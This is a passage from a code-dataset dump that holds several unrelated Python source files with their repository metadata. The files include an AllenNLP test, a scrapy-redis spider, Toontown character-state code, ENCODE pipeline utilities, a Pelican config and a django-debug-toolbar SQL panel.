"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {"num_tokens": 5, "num_token_characters": 8}
def test_as_tensor_handles_words(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
tensor_dict = field.as_tensor(padding_lengths)
numpy.testing.assert_array_almost_equal(tensor_dict["words"].detach().cpu().numpy(),
numpy.array([1, 1, 1, 2, 1]))
def test_as_tensor_handles_longer_lengths(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
padding_lengths["num_tokens"] = 10
tensor_dict = field.as_tensor(padding_lengths)
numpy.testing.assert_array_almost_equal(tensor_dict["words"].detach().cpu().numpy(),
numpy.array([1, 1, 1, 2, 1, 0, 0, 0, 0, 0]))
def test_as_tensor_handles_characters(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
tensor_dict = field.as_tensor(padding_lengths)
expected_character_array = numpy.array([[1, 1, 1, 3, 0, 0, 0, 0],
[1, 3, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0],
[3, 4, 5, 6, 4, 5, 7, 4],
[1, 0, 0, 0, 0, 0, 0, 0]])
numpy.testing.assert_array_almost_equal(tensor_dict["characters"].detach().cpu().numpy(),
expected_character_array)
def test_as_tensor_handles_words_and_characters_with_longer_lengths(self):
field = TextField([Token(t) for t in ["a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words"),
"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
padding_lengths["num_tokens"] = 5
padding_lengths["num_token_characters"] = 10
tensor_dict = field.as_tensor(padding_lengths)
numpy.testing.assert_array_almost_equal(tensor_dict["words"].detach().cpu().numpy(),
numpy.array([1, 2, 1, 0, 0]))
numpy.testing.assert_array_almost_equal(tensor_dict["characters"].detach().cpu().numpy(),
numpy.array([[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[3, 4, 5, 6, 4, 5, 7, 4, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]))
def test_printing_doesnt_crash(self):
field = TextField([Token(t) for t in ["A", "sentence"]],
{"words": SingleIdTokenIndexer(namespace="words")})
print(field)
def test_token_embedder_returns_dict(self):
field = TextField([Token(t) for t in ["A", "sentence"]],
token_indexers={"field_with_dict": DictReturningTokenIndexer(),
"words": SingleIdTokenIndexer("words"),
"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {
'token_ids': 5,
'additional_key': 2,
'words': 2,
'characters': 2,
'num_token_characters': 8
}
padding_lengths['token_ids'] = 7
padding_lengths['additional_key'] = 3
padding_lengths['words'] = 4
padding_lengths['characters'] = 4
tensors = field.as_tensor(padding_lengths)
assert list(tensors['token_ids'].shape) == [7]
assert list(tensors['additional_key'].shape) == [3]
assert list(tensors['words'].shape) == [4]
assert list(tensors['characters'].shape) == [4, 8]
| [
"[email protected]"
] | |
d7e3a030d9c4566cdb0b31432119685df41159a8 | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/pos_kitchen_printer/models/__init__.py | a1b6a6939adf5937fd8371d0fb565ad87d39edb1 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | # -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from . import pos_order
| [
"[email protected]"
] | |
d415c73efb114941108de5cc70bf361106a5cb61 | 9655434fa24cff892af8a6a54fc448ef7075926a | /scrapy框架/day07/redisSpiderPro/redisSpiderPro/spiders/redisSpiderTest.py | db9f1980547be6a56ec5fd15b5ca791643ba9bd8 | [] | no_license | chenrun666/Spider | acaa6849726417e0df56d4e43b52fd1de22ac1d8 | 2ec2e5621d0eaa15d2a2bcc2fa11642a9441888c | refs/heads/master | 2020-04-09T04:42:05.168983 | 2019-01-15T13:21:40 | 2019-01-15T13:21:40 | 160,032,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 943 | py | # -*- coding: utf-8 -*-
import scrapy
from scrapy_redis.spiders import RedisSpider
from redisSpiderPro.items import RedisspiderproItem
class RedisspidertestSpider(RedisSpider):
name = 'redisSpiderTest'
#allowed_domains = ['www.xxx,com']
#start_urls = ['http://www.xxx,com/']
redis_key = 'data' #调度器队列的名称
url = 'http://db.pharmcube.com/database/cfda/detail/cfda_cn_instrument/'
pageNum = 1
def parse(self, response):
num = response.xpath('/html/body/div/table/tbody/tr[1]/td[2]/text()').extract_first()
name = response.xpath('/html/body/div/table/tbody/tr[2]/td[2]/text()').extract_first()
item = RedisspiderproItem()
item['num'] = num
item['name'] = name
yield item
if self.pageNum <= 10000:
self.pageNum += 1
new_url = self.url + str(self.pageNum)
yield scrapy.Request(url=new_url,callback=self.parse)
| [
"[email protected]"
] | |
019b201d3703f4bbb1cdb006dd59a50afff07dcd | 7949f96ee7feeaa163608dbd256b0b76d1b89258 | /toontown/classicchars/CharStateDatas.py | 26ffd583121582f0f54056dcb7f70c5766f0c052 | [] | no_license | xxdecryptionxx/ToontownOnline | 414619744b4c40588f9a86c8e01cb951ffe53e2d | e6c20e6ce56f2320217f2ddde8f632a63848bd6b | refs/heads/master | 2021-01-11T03:08:59.934044 | 2018-07-27T01:26:21 | 2018-07-27T01:26:21 | 71,086,644 | 8 | 10 | null | 2018-06-01T00:13:34 | 2016-10-17T00:39:41 | Python | UTF-8 | Python | false | false | 10,549 | py | # File: t (Python 2.4)
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from direct.fsm import StateData
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import *
from direct.task import Task
import CCharPaths
from toontown.toonbase import ToontownGlobals
class CharNeutralState(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharNeutralState')
def __init__(self, doneEvent, character):
StateData.StateData.__init__(self, doneEvent)
self._CharNeutralState__doneEvent = doneEvent
self.character = character
def enter(self, startTrack = None, playRate = None):
StateData.StateData.enter(self)
self.notify.debug('Neutral ' + self.character.getName() + '...')
self._CharNeutralState__neutralTrack = Sequence(name = self.character.getName() + '-neutral')
if startTrack:
self._CharNeutralState__neutralTrack.append(startTrack)
if playRate:
self._CharNeutralState__neutralTrack.append(Func(self.character.setPlayRate, playRate, 'neutral'))
self._CharNeutralState__neutralTrack.append(Func(self.character.loop, 'neutral'))
self._CharNeutralState__neutralTrack.start()
def exit(self):
StateData.StateData.exit(self)
self._CharNeutralState__neutralTrack.finish()
def _CharNeutralState__doneHandler(self):
doneStatus = { }
doneStatus['state'] = 'walk'
doneStatus['status'] = 'done'
messenger.send(self._CharNeutralState__doneEvent, [
doneStatus])
return Task.done
class CharWalkState(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharWalkState')
def __init__(self, doneEvent, character, diffPath = None):
StateData.StateData.__init__(self, doneEvent)
self.doneEvent = doneEvent
self.character = character
if diffPath == None:
self.paths = CCharPaths.getPaths(character.getName(), character.getCCLocation())
else:
self.paths = CCharPaths.getPaths(diffPath, character.getCCLocation())
self.speed = character.walkSpeed()
self.offsetX = 0
self.offsetY = 0
self.oldOffsetX = 0
self.olfOffsetY = 0
self.walkTrack = None
def enter(self, startTrack = None, playRate = None):
StateData.StateData.enter(self)
self.notify.debug('Walking ' + self.character.getName() + '... from ' + str(self.walkInfo[0]) + ' to ' + str(self.walkInfo[1]))
posPoints = CCharPaths.getPointsFromTo(self.walkInfo[0], self.walkInfo[1], self.paths)
lastPos = posPoints[-1]
newLastPos = Point3(lastPos[0] + self.offsetX, lastPos[1] + self.offsetY, lastPos[2])
posPoints[-1] = newLastPos
firstPos = posPoints[0]
newFirstPos = Point3(firstPos[0] + self.oldOffsetX, firstPos[1] + self.oldOffsetY, firstPos[2])
posPoints[0] = newFirstPos
self.walkTrack = Sequence(name = self.character.getName() + '-walk')
if startTrack:
self.walkTrack.append(startTrack)
self.character.setPos(posPoints[0])
raycast = CCharPaths.getRaycastFlag(self.walkInfo[0], self.walkInfo[1], self.paths)
moveTrack = self.makePathTrack(self.character, posPoints, self.speed, raycast)
if playRate:
self.walkTrack.append(Func(self.character.setPlayRate, playRate, 'walk'))
self.walkTrack.append(Func(self.character.loop, 'walk'))
self.walkTrack.append(moveTrack)
doneEventName = self.character.getName() + 'WalkDone'
self.walkTrack.append(Func(messenger.send, doneEventName))
ts = globalClockDelta.localElapsedTime(self.walkInfo[2])
self.accept(doneEventName, self.doneHandler)
self.notify.debug('walkTrack.start(%s)' % ts)
self.walkTrack.start(ts)
def makePathTrack(self, nodePath, posPoints, velocity, raycast = 0):
track = Sequence()
if raycast:
track.append(Func(nodePath.enableRaycast, 1))
startHpr = nodePath.getHpr()
for pointIndex in range(len(posPoints) - 1):
startPoint = posPoints[pointIndex]
endPoint = posPoints[pointIndex + 1]
track.append(Func(nodePath.setPos, startPoint))
distance = Vec3(endPoint - startPoint).length()
duration = distance / velocity
curHpr = nodePath.getHpr()
nodePath.headsUp(endPoint[0], endPoint[1], endPoint[2])
destHpr = nodePath.getHpr()
reducedCurH = reduceAngle(curHpr[0])
reducedCurHpr = Vec3(reducedCurH, curHpr[1], curHpr[2])
reducedDestH = reduceAngle(destHpr[0])
shortestAngle = closestDestAngle(reducedCurH, reducedDestH)
shortestHpr = Vec3(shortestAngle, destHpr[1], destHpr[2])
turnTime = abs(shortestAngle) / 270.0
nodePath.setHpr(shortestHpr)
if duration - turnTime > 0.01:
track.append(Parallel(Func(nodePath.loop, 'walk'), LerpHprInterval(nodePath, turnTime, shortestHpr, startHpr = reducedCurHpr, name = 'lerp' + nodePath.getName() + 'Hpr'), LerpPosInterval(nodePath, duration = duration - turnTime, pos = Point3(endPoint), startPos = Point3(startPoint), fluid = 1)))
continue
nodePath.setHpr(startHpr)
if raycast:
track.append(Func(nodePath.enableRaycast, 0))
return track
def doneHandler(self):
doneStatus = { }
doneStatus['state'] = 'walk'
doneStatus['status'] = 'done'
messenger.send(self.doneEvent, [
doneStatus])
return Task.done
def exit(self):
StateData.StateData.exit(self)
self.ignore(self.character.getName() + 'WalkDone')
if self.walkTrack:
self.walkTrack.finish()
self.walkTrack = None
def setWalk(self, srcNode, destNode, timestamp, offsetX = 0, offsetY = 0):
self.oldOffsetX = self.offsetX
self.oldOffsetY = self.offsetY
self.walkInfo = (srcNode, destNode, timestamp)
self.offsetX = offsetX
self.offsetY = offsetY
class CharFollowChipState(CharWalkState):
notify = DirectNotifyGlobal.directNotify.newCategory('CharFollowChipState')
completeRevolutionDistance = 13
def __init__(self, doneEvent, character, chipId):
CharWalkState.__init__(self, doneEvent, character)
self.offsetDict = {
'a': (ToontownGlobals.DaleOrbitDistance, 0) }
self.chipId = chipId
def setWalk(self, srcNode, destNode, timestamp, offsetX = 0, offsetY = 0):
self.offsetDict[destNode] = (offsetX, offsetY)
self.srcNode = srcNode
self.destNode = destNode
self.orbitDistance = ToontownGlobals.DaleOrbitDistance
if (srcNode, destNode) in CCharPaths.DaleOrbitDistanceOverride:
self.orbitDistance = CCharPaths.DaleOrbitDistanceOverride[(srcNode, destNode)]
elif (destNode, srcNode) in CCharPaths.DaleOrbitDistanceOverride:
self.orbitDistance = CCharPaths.DaleOrbitDistanceOverride[(destNode, srcNode)]
CharWalkState.setWalk(self, srcNode, destNode, timestamp, offsetX, offsetY)
def makePathTrack(self, nodePath, posPoints, velocity, raycast = 0):
retval = Sequence()
if raycast:
retval.append(Func(nodePath.enableRaycast, 1))
chip = base.cr.doId2do.get(self.chipId)
self.chipPaths = CCharPaths.getPaths(chip.getName(), chip.getCCLocation())
self.posPoints = posPoints
chipDuration = chip.walk.walkTrack.getDuration()
self.notify.debug('chipDuration = %f' % chipDuration)
chipDistance = CCharPaths.getWalkDistance(self.srcNode, self.destNode, ToontownGlobals.ChipSpeed, self.chipPaths)
self.revolutions = chipDistance / self.completeRevolutionDistance
srcOffset = (0, 0)
if self.srcNode in self.offsetDict:
srcOffset = self.offsetDict[self.srcNode]
srcTheta = math.atan2(srcOffset[1], srcOffset[0])
if srcTheta < 0:
srcTheta += 2 * math.pi
if srcTheta > 0:
srcRev = (2 * math.pi - srcTheta) / 2 * math.pi
else:
srcRev = 0
self.srcTheta = srcTheta
destOffset = (0, 0)
if self.destNode in self.offsetDict:
destOffset = self.offsetDict[self.destNode]
destTheta = math.atan2(destOffset[1], destOffset[0])
if destTheta < 0:
destTheta += 2 * math.pi
self.destTheta = destTheta
self.revolutions += srcRev
endingTheta = srcTheta + (self.revolutions % 1.0) * 2 * math.pi
diffTheta = destTheta - endingTheta
destRev = diffTheta / 2 * math.pi
self.revolutions += destRev
while self.revolutions < 1:
self.revolutions += 1
def positionDale(t):
self.orbitChip(t)
retval.append(LerpFunctionInterval(positionDale, chipDuration))
if raycast:
retval.append(Func(nodePath.enableRaycast, 0))
return retval
def orbitChip(self, t):
srcOffset = (0, 0)
if self.srcNode in self.offsetDict:
srcOffset = self.offsetDict[self.srcNode]
chipSrcPos = Point3(self.posPoints[0][0] - srcOffset[0], self.posPoints[0][1] - srcOffset[1], self.posPoints[0][2])
destOffset = (0, 0)
if self.destNode in self.offsetDict:
destOffset = self.offsetDict[self.destNode]
chipDestPos = Point3(self.posPoints[-1][0] - destOffset[0], self.posPoints[-1][1] - destOffset[1], self.posPoints[-1][2])
displacement = chipDestPos - chipSrcPos
displacement *= t
chipPos = chipSrcPos + displacement
diffTheta = t * self.revolutions * 2 * math.pi
curTheta = self.srcTheta + diffTheta
newOffsetX = math.cos(curTheta) * self.orbitDistance
newOffsetY = math.sin(curTheta) * self.orbitDistance
dalePos = Point3(chipPos[0] + newOffsetX, chipPos[1] + newOffsetY, chipPos[2])
self.character.setPos(dalePos)
newHeading = rad2Deg(curTheta)
newHeading %= 360
self.character.setH(newHeading)
| [
"[email protected]"
] | |
d6aef98a8cc8710fdc5ffecf706514f2625f6753 | efebd5c42f5e5048d0db2022a7f1115605f403a2 | /dnanexus/encode_idr/resources/home/dnanexus/common.py | f47f951370dccf22c885c0a1fe3038e8cec65374 | [] | no_license | crazyhottommy/chip-seq-pipeline | d5854d01bcf99d82d7f830c9513a1320d806e83b | 44163d89d8649d8193e62ff4c49b113b01038703 | refs/heads/master | 2020-04-05T23:28:50.538573 | 2015-08-12T12:43:58 | 2015-08-12T12:43:58 | 42,424,548 | 2 | 2 | null | 2015-09-14T03:16:54 | 2015-09-14T03:16:54 | null | UTF-8 | Python | false | false | 8,518 | py | #!/usr/bin/env python
import sys, os, subprocess, shlex, logging, re, urlparse
import dateutil.parser
def test():
print "In common.test"
def rstrips(string, substring):
if not string.endswith(substring):
return string
else:
return string[:len(string)-len(substring)]
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
def block_on(command):
process = subprocess.Popen(shlex.split(command), stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
sys.stdout.write(line)
process.wait()
return process.returncode
def run_pipe(steps, outfile=None):
#break this out into a recursive function
#TODO: capture stderr
from subprocess import Popen, PIPE
p = None
p_next = None
first_step_n = 1
last_step_n = len(steps)
for n,step in enumerate(steps, start=first_step_n):
print "step %d: %s" %(n,step)
if n == first_step_n:
if n == last_step_n and outfile: #one-step pipeline with outfile
with open(outfile, 'w') as fh:
print "one step shlex: %s to file: %s" %(shlex.split(step), outfile)
p = Popen(shlex.split(step), stdout=fh)
break
print "first step shlex to stdout: %s" %(shlex.split(step))
p = Popen(shlex.split(step), stdout=PIPE)
#need to close p.stdout here?
elif n == last_step_n and outfile: #only treat the last step specially if you're sending stdout to a file
with open(outfile, 'w') as fh:
print "last step shlex: %s to file: %s" %(shlex.split(step), outfile)
p_last = Popen(shlex.split(step), stdin=p.stdout, stdout=fh)
p.stdout.close()
p = p_last
else: #handles intermediate steps and, in the case of a pipe to stdout, the last step
print "intermediate step %d shlex to stdout: %s" %(n,shlex.split(step))
p_next = Popen(shlex.split(step), stdin=p.stdout, stdout=PIPE)
p.stdout.close()
p = p_next
out,err = p.communicate()
return out,err
def uncompress(filename):
#leaves compressed file intact
m = re.match('(.*)(\.((gz)|(Z)|(bz)|(bz2)))',filename)
if m:
basename = m.group(1)
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(filename))))
logging.info("Decompressing %s" %(filename))
#logging.info(subprocess.check_output(shlex.split('gzip -dc %s' %(filename))))
out,err = run_pipe([
'gzip -dc %s' %(filename)],
basename)
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(basename))))
return basename
else:
return filename
def compress(filename):
#leaves uncompressed file intact
if re.match('(.*)(\.((gz)|(Z)|(bz)|(bz2)))',filename):
return filename
else:
logging.info(subprocess.check_output(shlex.split('cp %s tmp' %(filename))))
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(filename))))
logging.info("Compressing %s" %(filename))
logging.info(subprocess.check_output(shlex.split('gzip %s' %(filename))))
new_filename = filename + '.gz'
logging.info(subprocess.check_output(shlex.split('cp tmp %s' %(filename))))
logging.info(subprocess.check_output(shlex.split('ls -l %s' %(new_filename))))
return new_filename
def count_lines(fname):
wc_output = subprocess.check_output(shlex.split('wc -l %s' %(fname)))
lines = wc_output.split()[0]
return int(lines)
def bed2bb(bed_filename, chrom_sizes, as_file, bed_type='bed6+4'):
if bed_filename.endswith('.bed'):
bb_filename = bed_filename[:-4] + '.bb'
else:
bb_filename = bed_filename + '.bb'
bed_filename_sorted = bed_filename + ".sorted"
logging.debug("In bed2bb with bed_filename=%s, chrom_sizes=%s, as_file=%s" %(bed_filename, chrom_sizes, as_file))
print "Sorting"
print subprocess.check_output(shlex.split("sort -k1,1 -k2,2n -o %s %s" %(bed_filename_sorted, bed_filename)), shell=False, stderr=subprocess.STDOUT)
for fn in [bed_filename, bed_filename_sorted, chrom_sizes, as_file]:
print "head %s" %(fn)
print subprocess.check_output('head %s' %(fn), shell=True, stderr=subprocess.STDOUT)
command = "bedToBigBed -type=%s -as=%s %s %s %s" %(bed_type, as_file, bed_filename_sorted, chrom_sizes, bb_filename)
print command
try:
process = subprocess.Popen(shlex.split(command), stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
sys.stdout.write(line)
process.wait()
returncode = process.returncode
if returncode != 0:
raise subprocess.CalledProcessError
except:
e = sys.exc_info()[0]
sys.stderr.write('%s: bedToBigBed failed. Skipping bb creation.' %(e))
return None
#print subprocess.check_output('ls -l', shell=True, stderr=subprocess.STDOUT)
#this is necessary in case bedToBegBed failes to create the bb file but doesn't return a non-zero returncode
try:
os.remove(bed_filename_sorted)
except:
pass
if not os.path.isfile(bb_filename):
bb_filename = None
print "Returning bb file %s" %(bb_filename)
return bb_filename
def rescale_scores(fn, scores_col, new_min=10, new_max=1000):
n_peaks = count_lines(fn)
sorted_fn = '%s-sorted' %(fn)
rescaled_fn = '%s-rescaled' %(fn)
out,err = run_pipe([
'sort -k %dgr,%dgr %s' %(scores_col, scores_col, fn),
r"""awk 'BEGIN{FS="\t";OFS="\t"}{if (NF != 0) print $0}'"""],
sorted_fn)
out, err = run_pipe([
'head -n 1 %s' %(sorted_fn),
'cut -f %s' %(scores_col)])
max_score = float(out.strip())
out, err = run_pipe([
'tail -n 1 %s' %(sorted_fn),
'cut -f %s' %(scores_col)])
min_score = float(out.strip())
out,err = run_pipe([
'cat %s' %(sorted_fn),
r"""awk 'BEGIN{OFS="\t"}{n=$%d;a=%d;b=%d;x=%d;y=%d}""" %(scores_col, min_score, max_score, new_min, new_max) + \
r"""{$%d=int(((n-a)*(y-x)/(b-a))+x) ; print $0}'""" %(scores_col)],
rescaled_fn)
return rescaled_fn
def processkey(key, keyfile=None):
import json
if not keyfile:
try:
keyfile = KEYFILE
except:
print >> sys.stderr, "No keyfile was specified."
raise
if key:
keysf = open(keyfile,'r')
keys_json_string = keysf.read()
keysf.close()
keys = json.loads(keys_json_string)
key_dict = keys[key]
else:
key_dict = {}
AUTHID = key_dict.get('key')
AUTHPW = key_dict.get('secret')
if key:
SERVER = key_dict.get('server')
else:
SERVER = DEFAULT_SERVER
if not SERVER.endswith("/"):
SERVER += "/"
return (AUTHID,AUTHPW,SERVER)
def encoded_get(url, keypair=None, frame='object'):
import urlparse, requests
HEADERS = {'content-type': 'application/json'}
url = urlparse.urljoin(url,'?format=json&frame=%s' %(frame))
if keypair:
response = requests.get(url, auth=keypair, headers=HEADERS)
else:
response = requests.get(url, headers=HEADERS)
return response.json()
def pprint_json(JSON_obj):
import json
print json.dumps(JSON_obj, sort_keys=True, indent=4, separators=(',', ': '))
def merge_dicts(*dict_args):
'''
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
'''
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def md5(fn):
if 'md5_command' not in globals():
global md5_command
if not subprocess.check_call('which md5', shell=True):
md5_command = 'md5 -q'
elif not subprocess.check_call('which md5sum', shell=True):
md5_command = 'md5sum'
else:
md5_command = ''
md5_output = subprocess.check_output(' '.join([md5_command, fn]), shell=True)
return md5_output.partition(' ')[0].rstrip()
def after(date1, date2):
try:
result = dateutil.parser.parse(date1) > dateutil.parser.parse(date2)
except TypeError:
if not re.search('\+.*$', date1):
date1 += 'T00:00:00-07:00'
if not re.search('\+.*$', date2):
date1 += 'T00:00:00-07:00'
try:
result = dateutil.parser.parse(date1) > dateutil.parser.parse(date2)
except Exception as e:
logger.error("%s Cannot compare bam date %s with fastq date %s" %(e, bam.get('date_created'), f.get('date_created')))
raise
return result
def biorep_ns_generator(file_accession,server,keypair):
m = re.match('^/?(files)?/?(\w*)', file_accession)
if m:
acc = m.group(2)
else:
return
url = urlparse.urljoin(server, '/files/%s' %(acc))
file_object = encoded_get(url, keypair)
if file_object.get('derived_from'):
for f in file_object.get('derived_from'):
for repnum in biorep_ns_generator(f,server,keypair):
yield repnum
else:
url = urlparse.urljoin(server, '%s' %(file_object.get('replicate')))
replicate_object = encoded_get(url, keypair)
yield replicate_object.get('biological_replicate_number')
def biorep_ns(file_accession,server,keypair):
return list(set(biorep_ns_generator(file_accession,server,keypair)))
| [
"[email protected]"
] | |
b08549cdc9930326c9806f5c1e261d6761327e2b | 4af5c720758bd4ef36ccf94934fa79ddfc6d29ab | /pelicanconf.py | a7b514784cb9a8bf6cbbdf25f15b355abd50c4a4 | [] | no_license | juhhcarmona/grupyrp.github.io | 5151fff8463821d8976ddf175281755b21a54675 | 9c1c68185ae95bd419bbb939493c3940fd5b319b | refs/heads/pelican | 2021-01-11T03:56:10.644068 | 2016-10-18T20:10:58 | 2016-10-18T20:10:58 | 71,271,500 | 0 | 0 | null | 2016-10-18T17:03:34 | 2016-10-18T17:03:31 | Python | UTF-8 | Python | false | false | 3,042 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
AUTHOR = u'Grupy-RP'
SITENAME = u'Grupy-RP'
SITEURL = ''
PATH = 'content'
TIMEZONE = 'America/Sao_Paulo'
THEME = 'themes/malt'
SITE_LOGO = 'images/logo/logo.png'
SITE_BACKGROUND_IMAGE = 'images/banners/aerea.jpg'
STATIC_PATHS = ['images', ]
WELCOME_TITLE = 'Grupy-RP'
DEFAULT_LANG = u'pt'
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
AUTHOR_FEED_ATOM = None
AUTHOR_FEED_RSS = None
PAGE_URL = '{slug}'
PAGE_SAVE_AS = '{slug}.html'
INDEX_SAVE_AS = "blog/index.html"
PLUGIN_PATHS = ['./plugins']
PLUGINS = [
'members'
]
# Blogroll
LINKS = (('Pelican', 'http://getpelican.com/'),
('Python.org', 'http://python.org/'),
('Jinja2', 'http://jinja.pocoo.org/'),
('You can modify those links in your config file', '#'),)
# Social widget
SOCIAL = (('You can add links in your config file', '#'),
('Another social link', '#'),)
DEFAULT_PAGINATION = False
SOCIAL_LINKS = (
{
"href": "https://github.com/grupyrp",
"icon": "fa-github",
"text": "GitHub",
},
{
"href": "https://www.facebook.com/grupyrp",
"icon": "fa-facebook",
"text": "Facebook",
},
{
"href": "https://groups.google.com/forum/#!forum/grupy-rp",
"icon": "fa-envelope",
"text": "Lista de emails",
},
)
MALT_HOME = [
{
"color": "blue-grey lighten-5",
"title": "O que Fazemos?",
"items": [
{
"title": "Comunidade",
"icon": "fa-comments",
"text": (
"Somos uma comunidade de desenvolvedores e entusiastas da "
"linguagem de programação Python, aqui alguns lugares onde "
"nos encontrar"),
"buttons": [
{
"text": "Saiba Mais",
"href": "comunidade",
},
],
},
{
"title": "Membros",
"icon": "fa-users",
"text": (
"Nosso grupo é formado pelos mais diversos tipos de "
"pessoas, com histórias e personalidades diferentes, veja"
"quem somos"),
"buttons": [
{
"text": "Conheça",
"href": "membros",
},
],
},
{
"title": "Projetos",
"icon": "fa-briefcase",
"text": "",
"buttons": [
{
"text": "Mais detalhes",
"href": "",
},
],
},
]
},
]
# Uncomment following line if you want document-relative URLs when developing
# RELATIVE_URLS = True
| [
"[email protected]"
] | |
7290065a273141e75604456bb17635a31582454d | d1f32ec9b972c38951939978f12b3ad20db6a96c | /src/debug_toolbar/panels/sql/panel.py | 71ef283f0edf4d6938f26482d8b613cab760c605 | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | domyhero/sentry | b69f4a4fec38d6ed7adc199f24a866528e92b87e | a418072946ebd2933724945e1ea2a833cf4c9b94 | refs/heads/master | 2021-01-01T16:21:44.227712 | 2017-07-19T22:32:00 | 2017-07-19T22:48:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,038 | py | from __future__ import absolute_import, unicode_literals
import uuid
from copy import copy
from collections import defaultdict
from django.conf.urls import url
from django.db import connections
from django.utils.translation import ugettext_lazy as _, ungettext_lazy as __
from debug_toolbar.panels import Panel
from debug_toolbar.panels.sql.forms import SQLSelectForm
from debug_toolbar.utils import render_stacktrace
from debug_toolbar.panels.sql.utils import reformat_sql, contrasting_color_generator
from debug_toolbar.panels.sql.tracking import wrap_cursor, unwrap_cursor
from debug_toolbar.panels.sql import views
def get_isolation_level_display(vendor, level):
if vendor == 'postgresql':
import psycopg2.extensions
choices = {
psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT: _("Autocommit"),
psycopg2.extensions.ISOLATION_LEVEL_READ_UNCOMMITTED: _("Read uncommitted"),
psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED: _("Read committed"),
psycopg2.extensions.ISOLATION_LEVEL_REPEATABLE_READ: _("Repeatable read"),
psycopg2.extensions.ISOLATION_LEVEL_SERIALIZABLE: _("Serializable"),
}
else:
raise ValueError(vendor)
return choices.get(level)
def get_transaction_status_display(vendor, level):
if vendor == 'postgresql':
import psycopg2.extensions
choices = {
psycopg2.extensions.TRANSACTION_STATUS_IDLE: _("Idle"),
psycopg2.extensions.TRANSACTION_STATUS_ACTIVE: _("Active"),
psycopg2.extensions.TRANSACTION_STATUS_INTRANS: _("In transaction"),
psycopg2.extensions.TRANSACTION_STATUS_INERROR: _("In error"),
psycopg2.extensions.TRANSACTION_STATUS_UNKNOWN: _("Unknown"),
}
else:
raise ValueError(vendor)
return choices.get(level)
class SQLPanel(Panel):
"""
Panel that displays information about the SQL queries run while processing
the request.
"""
def __init__(self, *args, **kwargs):
super(SQLPanel, self).__init__(*args, **kwargs)
self._offset = dict((k, len(connections[k].queries)) for k in connections)
self._sql_time = 0
self._num_queries = 0
self._queries = []
self._databases = {}
self._transaction_status = {}
self._transaction_ids = {}
def get_transaction_id(self, alias):
if alias not in connections:
return
conn = connections[alias].connection
if not conn:
return
if conn.vendor == 'postgresql':
cur_status = conn.get_transaction_status()
else:
raise ValueError(conn.vendor)
last_status = self._transaction_status.get(alias)
self._transaction_status[alias] = cur_status
if not cur_status:
# No available state
return None
if cur_status != last_status:
if cur_status:
self._transaction_ids[alias] = uuid.uuid4().hex
else:
self._transaction_ids[alias] = None
return self._transaction_ids[alias]
def record(self, alias, **kwargs):
self._queries.append((alias, kwargs))
if alias not in self._databases:
self._databases[alias] = {
'time_spent': kwargs['duration'],
'num_queries': 1,
}
else:
self._databases[alias]['time_spent'] += kwargs['duration']
self._databases[alias]['num_queries'] += 1
self._sql_time += kwargs['duration']
self._num_queries += 1
# Implement the Panel API
nav_title = _("SQL")
@property
def nav_subtitle(self):
return __("%d query in %.2fms", "%d queries in %.2fms",
self._num_queries) % (self._num_queries, self._sql_time)
@property
def title(self):
count = len(self._databases)
return __('SQL queries from %(count)d connection',
'SQL queries from %(count)d connections',
count) % {'count': count}
template = 'debug_toolbar/panels/sql.html'
@classmethod
def get_urls(cls):
return [
url(r'^sql_select/$', views.sql_select, name='sql_select'),
url(r'^sql_explain/$', views.sql_explain, name='sql_explain'),
url(r'^sql_profile/$', views.sql_profile, name='sql_profile'),
]
def enable_instrumentation(self):
# This is thread-safe because database connections are thread-local.
for connection in connections.all():
wrap_cursor(connection, self)
def disable_instrumentation(self):
for connection in connections.all():
